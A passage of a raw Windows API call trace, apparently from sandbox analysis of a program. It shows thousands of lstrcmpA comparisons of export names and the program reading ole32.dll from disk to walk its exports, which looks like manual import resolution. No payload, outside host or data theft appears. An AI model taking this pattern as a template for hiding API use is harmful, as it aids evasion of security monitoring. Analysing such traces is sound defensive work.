(lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0239.063] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0239.064] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0239.065] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0239.066] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0239.066] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0239.066] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0239.723] GetProcessHeap () returned 0x430000 [0239.723] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c92010 | out: hHeap=0x430000) returned 1 [0239.973] GetProcessHeap () returned 0x430000 [0239.973] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4499e0 [0239.974] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0239.975] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0239.976] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0239.976] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0239.976] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0239.976] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0239.976] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0239.976] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0239.976] GetProcessHeap () returned 0x430000 [0239.976] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x142d00) returned 0x4054040 [0239.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0239.980] ReadFile (in: hFile=0x140, lpBuffer=0x4054040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4054040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0240.209] CloseHandle (hObject=0x140) returned 1 [0240.210] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0240.210] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0240.210] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.210] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.210] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0240.210] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0240.211] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0240.212] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0240.212] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0240.212] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0240.212] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0240.212] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0240.212] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0240.212] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0240.212] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0240.213] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0240.213] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0240.213] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0240.214] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0240.214] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0240.215] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0240.215] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0240.215] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0240.216] lstrcmpA 